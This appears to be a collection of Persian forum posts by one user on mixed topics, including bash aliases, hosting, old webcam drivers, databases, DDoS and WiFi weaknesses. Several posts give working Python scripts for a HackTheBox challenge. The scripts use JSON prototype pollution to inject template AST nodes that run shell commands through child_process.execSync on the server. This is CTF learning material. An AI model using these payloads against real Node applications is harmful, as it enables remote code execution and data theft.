mmj-sys

سلام دوستان کامند alias یه چیزیه که مردم زیاد ازش استفاده نمی کنن یا شایدم میکنن من نمیدونم این کاند میاد و یک کلمه معادل دستورات شما قرار میده که هر وقت اون کلمه رو بزنین بجاش اون وارد بشه به صورت خودکار مثلا خیلی ها عادت دارن بجای ls میان ls -ltrha رو میگیرن و خب کار بدی نیست که همه اطلاعات دایرکتوری رو داشته باشیم alias میاد و یک ورودی رو میگیره و بایستی قالبش این شکلی باشه alias ls="ls -ltrh " الان که دارم مینویسم این کد بالا از راست به چپه نمیدونم چجوری درستش کنم شاید درست نشون داده بشه برا شما اما اگه نشد به بزرگی خودتون ببخشید بریم سر اصل مطلب این کامند میاد مث نام مستعار عمل میکنه اگه کد بالا رو بزنین و بعد ls خالی بگیرین میبینین فرق کرده حالا میتونید برا هر کامندی یا هر کلمه ای که دلتون میخواد alias بزنین و کاند جدید بسازید اگه این کارو انجام بدید متوجه این میشید که ماندگار نیست و با بستن ترمینال میره برای همین باید با توجه به shell تون که پیشفرض bash هست فایل رو ادیت کنید . Bash – ~/.bashrc ZSH – ~/.zshrc Fish – ~/.config/fish/config.fish با دستور nano ./bashrc یادتون باشه به هیچی دست نزنین فقط ته تهش یه خط جدید باز کنید و کامند هایی که میخواید و بزنید اینجوری هر وقت ترمینال باز بشه خودش اجرا میشه

گراب رو تو کدوم مسیر نصب کردی ؟؟

خب به این کار چه نیازی هست ؟؟ وقتی دامین رو در اختیار داری دیگه زمپ به چه کار میاد ؟؟ روی وی پس اس کافیه cpanel رو نصب کنی

سی پنل هر وبسایت مال سایت ارای دهنده خدمات هاستینگشه رو خود وبسایت نیست

بلاخره با اسکریپت زیر تونستم کارو تموم کنم یه زمانی میگفتن پایتون برای اکسپلویت نویسی عالیه ولی نمیفهمیدم چرا الان به معنای واقعی کلمه درک کردم اسکریپت نهایی import requests TARGET_URL = '[Hidden Content]' # make pollution r = requests.post(TARGET_URL+'/api/submit', json = {"artist.name":"Westaway", "__proto__.type": "Program", "__proto__.block": { "type": "Text", "line": "process.mainModule.require('child_process').execSync('cat flag2GSEN > static/js/main.js')" } }) print(r.status_code) print(r.text) فقط کافیه با کروم یا یه ریکویست ته اسکریپت رو به مسیر host:port/static/js/main.js بزنید و تهش فلگ خونده میشه و براتون به نمایش در میاد

مشکل در اینجا بود که من وقتی دستور رو میزدم رسپانسش توی هیچی نمیریختم import requests TARGET_URL = '[Hidden Content]' # make pollution r = requests.post(TARGET_URL+'/api/submit', json = {"artist.name":"Westaway", "__proto__.type": "Program", "__proto__.block": { "type": "Text", "line": "process.mainModule.require('child_process').execSync('ls > static/js/main.js')" } }) print(r.status_code) print(r.text) # اینجا میتونید یه ریکویست به اون صفحه و فایل دلخواه بزنید ولی من با کرون رفتم سریع تر بشه این الان به من فایلا رو نشون داد الان کافیه فایل فلگ رو بخونم

الان متوجه شدم که اسکریپت بالا برای handelbar بوده و سرور از کامپایلر pug استفاده میکنه و الان میتونم به سرور یه چیزی بفرستم ولی پاسخ : 200 {"response":"<span>Hello guestndefine, thank you for letting us know!</span>"} رو داریم اگه اکسپلویت من با اسکریپت زیر : import requests TARGET_URL = '[Hidden Content]' # make pollution r = requests.post(TARGET_URL+'/api/submit', json = {"artist.name":"Westaway", "__proto__.type": "Program", "__proto__.block": { "type": "Text", "line": "process.mainModule.require('child_process').execSync('ls')" } }) print(r.status_code) print(r.text) کار نمیکرد باید این پاسخ رو میداد 200 {"response":"<span>Hello guest, thank you for letting us know!</span>"} الان نمیدونم چرا کامندم ران نمیشه با اگرهم ران میشه نمیتونم وصل شم

سلام دوستان من امروز توی سایت hackthebox به یک مشکل برخوردم داستان از این قراره که یه سایت هست که فیلد داره و اون فیلد اسم مشخصی رو از ما میگیره یه ورودی رو به ادرس /api/submit پست میکنه که اگه ما یه بخش اضافه با جیسان بفستیم اون کد رو ران میکنه ادرس سایت چلنج رو باید خودتون از hathebox بگیرید چون متفاوته سورس رو هم میتونید دانلود کنید اما من وقتی دنبال این داستان رفتم به هر جایی سر زدم نشد که نشد حتی اسکریپت های خودشون هم که میگن کار کرده کار نمیکنه برا من و 404 میده import requests TARGET_URL = '[Hidden Content]' r = requests.post(TARGET_URL+'/api/submit', json = { "artist.name":"Gingell", "__proto__.type": "Program", "__proto__.body": [{ "type": "MustacheStatement", "path": 0, "params": [{ "type": "NumberLiteral", "value": "process.mainModule.require('child_process').execSync('cat flag* > static/js/main.js')" }], "loc": { "start": 0, "end": 0 } }] }) print(r.status_code) print(r.text) print(requests.get(TARGET_URL+'/static/main.js').text) لینک چلنج

داداش من خواستم کمکت کنم اما نفهمیدم داری چیکار میکنی چرا کاربر باید توی فیلد عدد رشته bot رو وارد کنه که در اون صورت هم نمیشه چون باید یک تاپل ارد کنه با مقدار که توی تابع اینپوت غیر ممکنه اگه منظورت توی دستور شرط متغیر bot نباید توی پرانتز و کوتیشن بزارید اونجوری میگید bot یک رشته هست در ضمن چرا باز bot ریختید توی جایزه ؟؟؟ کد درهمی بود معلوم نبود چی به چیه

تا جایی که من میدونم یک سرویس ویندوزی هستش

سلام دوستان من یه وب کم creative live motion دارم این رو از عهد بوق خریده بودم ینی زمانی که تازه ویندوز نود هشت درومده بود یه سی دی درایور داره که تست کردم فقط رو ویندوز اکس پی کار کرد الان میخوام رو ویندوز ده امتحانش کنم اما میگه نمی تونید رو این نصبش کنید و بسته میشه درایوراش هم نتونستم پیدا کنم برا ویندوز ده الان هیچ راهی وجود نداره که درایور های اکس پی رو به ویندوز ده منتقل کرد ؟؟؟

اگه تاحالا با اکسل کار کرده باشین میتونین جداول رو مثل یک فایل اکسل در نظر بگیرید من میام و اطلاعات سه نفر رو جمع میکنم و میخوام که فقط نام سن و جنسیت رو ذخیره کنم خب میام و سه سوتون به نام های اسم و سن و جنسیت تشکیل میدم بعد دونه دونه افراد رو توی ردیف ها قرار میدم و اضافه میکنم حالا یه تاپیک رو در نظر بگیر یه اسم داره یه متن داره تگ داره دسته بندی داره تمام این ها در دیتابیس ذخیره می شن دیتابیس های مختلف طرز ذخیره سازی ها مختلف کار میکنن که اکثرن با متن ها کار میکنن اما اگر قرار باشه عکس یا داده های غیر نوشتاری رو ذخیره کنین میتونید به صورت blob ذخیره کنین شون تمام این هایی که گفتم برای sql ها بود nosql ها ساختار این شکلی ندارن

نگاه کنید اول بگم که این کار که پیام خالی یا خارج از مسئله بدید کار اشتباهیه لطفا دیگه تکرار نشه نکته دوم اینه که دیگه دی داس حمله انچنانی محسوب نمیشه اف کردن سایت هم برای نیم ساعت هم باشه به درد نمیخوره و جدیدا با تکنولوژی انتی دی داس هم ایپی تون بلاک میشه هم اگر بلاک نشید cdn رو دیگه اکثر سایتا دارن بنابر این دنبال باگ ها بگردید بیشتر نتیجه میگیرید اینجوری هم به مودم خودتون اسیب میزنید

نگاه کنید پروتکل هایی که توسط وای فای پشتیبانی میشن اکثرا دارای باگ هایی هستم که به راحتی هک میشن اما خب تخصص خودشو میخواد و یکم صبر و حوصله و بزار کافی اما اینکه wps شما روشن باشه ssid هم بهشون بدید دیگه هک کردنش با گوشی موبایل بدون روت هم امکان پذیره بنده گوشی های اپل رو که تست میکردم وقتی گوشی روشن بود و صفحه فعالیت داشت و شما رمز هم زده بودید SSID نمایش داده میشد اما وقتی صفحه لاک میشد دیگه SSID مخفی میشد و هک کردن بدون SSID ممکن نیست

متوجه منظورتون نشدم ینی چی که میخواید بندازید روی ویندوز